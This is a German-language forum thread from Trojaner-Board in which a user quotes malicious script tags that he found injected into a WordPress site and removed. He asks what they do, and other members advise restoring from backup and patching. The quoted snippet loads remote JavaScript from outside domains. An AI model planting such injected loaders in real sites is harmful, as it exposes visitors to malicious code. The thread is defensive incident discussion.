Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Diskussionsforum (https://www.trojaner-board.de/diskussionsforum/)
-   -   Script Code auf eigener Webseite gefunden (https://www.trojaner-board.de/199138-script-code-eigener-webseite-gefunden.html)

dermikey 21.05.2020 17:53
Script Code auf eigener Webseite gefunden
 
Liebe Leute,

ich bin froh, lange nicht mehr hier gewesen zu sein. Lange nichts eingefangen :)

Heute wurde ich von einem Bekannten angeschrieben, dessen Wordpress-Webseite ich vor langer Zeit aufgesetzt habe.

Sein Kaspersky würde neuerdings anschlagen, wenn er seine Webseite besucht.
Komisch, Windows Defender, Chrome und Avira bleiben bei mir ruhig.

Aber tatsächlich, in zwei Unterseiten fand ich ein Script, was dort nichts verloren hat.
Script entfernt, Kaspersky ruhig.

Frage jetzt: Kann ich mir was eingefangen haben? Scann mit Malewarebytes brachte keinen Fund.

Vielleicht ist ja hier jemand, der sich mit Scripten und HTML auskennt. Folgendes Script habe ich vorgefunden und entfernt.
Was macht es und hat es bei mir als Endanwender/Webseitenbesucher etwas ausgelöst?

Zitat:
<p><script src="//permissnew.com/1cbabfaba9fb0d03cc.js"></script><script src="hxxp://permissnew.com/optout/set/lat?jsonp=__twb_cb_168411711&amp;key=1cbabfaba9fb0d03cc&amp;cv=1535615818&amp;t=1535615818018" type="text/javascript"></script><script src="hxxp://permissnew.com/optout/set/lt?jsonp=__twb_cb_22600740&amp;key=1cbabfaba9fb0d03cc&amp;cv=197950&amp;t=1535615818022" type="text/javascript"></script><script src="hxxp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&amp;r=1535615818037" type="text/javascript"></script><script src="hxxp://permissnew.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&amp;title=FF_%5B601%5D_missionewapp.cool&amp;blocks[]=31af2" type="text/javascript"></script></p>

cosinus 21.05.2020 19:31
Setz deinen Webserver zurück vom letzen Backup. Und ihr müsst zusehen, dass immer die aktuelle Wordpressversion drin ist.^

dermikey 21.05.2020 20:02
Zitat:
Zitat von cosinus (Beitrag 1736035)
Setz deinen Webserver zurück vom letzen Backup. Und ihr müsst zusehen, dass immer die aktuelle Wordpressversion drin ist.^
Webseite ist wieder sauber. Wordpress immer aktuell.
Frage ist jetzt: Kann mir das Script etwas angehabt haben?
Die üblichen Scans sehen sauber aus. Ich kann aber keine Script-Befehle lesen. Was macht das Ding?

stefanbecker 21.05.2020 22:38
Falsche Frage. Über welche Sicherheitslücke kam der Angreifer auf die Maschine?

cosinus 21.05.2020 22:54
Zitat:
Zitat von stefanbecker (Beitrag 1736052)
Falsche Frage. Über welche Sicherheitslücke kam der Angreifer auf die Maschine?
Warum. Die haben doch auf irgeneinem Rechner Kaspersky oder AVG. Und deswegen wollte der Chef keine weiteren IT-Fuzzies.

GeEichberger 31.07.2020 10:29
Gerhard Eichberger


Zitat:
Zitat von stefanbecker (Beitrag 1736052)
Falsche Frage. Über welche Sicherheitslücke kam der Angreifer auf die Maschine?
Glaubst Du, daß sich das herausfinden läßt?


Gerhard


Alle Zeitangaben in WEZ +1. Es ist jetzt 19:26 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55